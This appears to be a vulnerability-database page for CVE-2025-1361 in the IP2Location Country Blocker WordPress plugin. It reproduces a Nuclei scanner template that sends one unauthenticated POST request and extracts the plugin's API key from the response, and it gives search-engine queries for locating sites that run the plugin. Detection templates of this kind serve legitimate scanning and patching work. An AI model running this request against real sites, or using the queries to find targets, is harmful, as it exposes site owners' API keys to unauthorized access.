| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-1361 | 22 Feb 202509:23 | – | circl | |
| WordPress plugin IP2Location Country Blocker 授权问题漏洞 | 22 Feb 202500:00 | – | cnnvd | |
| CVE-2025-1361 | 22 Feb 202508:22 | – | cve | |
| CVE-2025-1361 IP2Location Country Blocker <= 2.38.8 - Missing Authorization to Unauthenticated Information Exposure via admin_init Function | 22 Feb 202508:22 | – | cvelist | |
| EUVD-2025-4441 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-1361 | 22 Feb 202509:15 | – | nvd | |
| CVE-2025-1361 | 22 Feb 202509:15 | – | osv | |
| WordPress IP2Location Country Blocker plugin <= 2.38.8 - Missing Authorization to Unauthenticated Information Exposure via admin_init Function vulnerability | 21 Feb 202521:59 | – | patchstack | |
| PT-2025-7500 | 22 Feb 202500:00 | – | ptsecurity | |
| CVE-2025-1361 | 7 Jan 202609:11 | – | redhatcve |
id: CVE-2025-1361
info:
name: IP2Location Country Blocker < 2.38.9 - Unauthenticated Information Disclosure
author: pussycat0x
severity: high
description: |
IP2Location Country Blocker plugin for WordPress up to version 2.38.8 contains a regular information exposure caused by missing capability checks on admin_init(), letting unauthenticated attackers view plugin settings, exploit requires no special conditions.
impact: |
Unauthenticated attackers can view plugin settings, potentially leading to information disclosure or further attacks.
remediation: |
Update to the latest version of the plugin that fixes the capability check issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7
- https://wpscan.com/vulnerability/3629be51-7c7e-4677-917f-a0693df3980f/
- https://wordpress.org/plugins/ip2location-country-blocker/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-1361
cwe-id: CWE-862
epss-score: 0.01278
epss-percentile: 0.66498
cpe: cpe:2.3:a:ip2location:country_blocker:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ip2location-country-blocker/"
fofa-query: body="/wp-content/plugins/ip2location-country-blocker/"
shodan-query: http.html:"/wp-content/plugins/ip2location-country-blocker/"
tags: cve,cve2025,wordpress,wp-plugin,wp-scan,ip2location-country-blocker,unauth
http:
- raw:
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=download_backup
matchers:
- type: dsl
dsl:
- 'contains_all(body, "ip2location_country_blocker_api_key")'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
extractors:
- type: regex
name: api_key
part: body
group: 1
regex:
- '"ip2location_country_blocker_api_key":"([^"]*)"'
# digest: 4a0a00473045022100b1671d2d26769f8faef34cf120e7a3d64a3eda25359b0bc8657cb38b0e06df860220766acf048ef290f17c95d25d44f2a76720b5a76dc38b9000744f935cbc982666:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation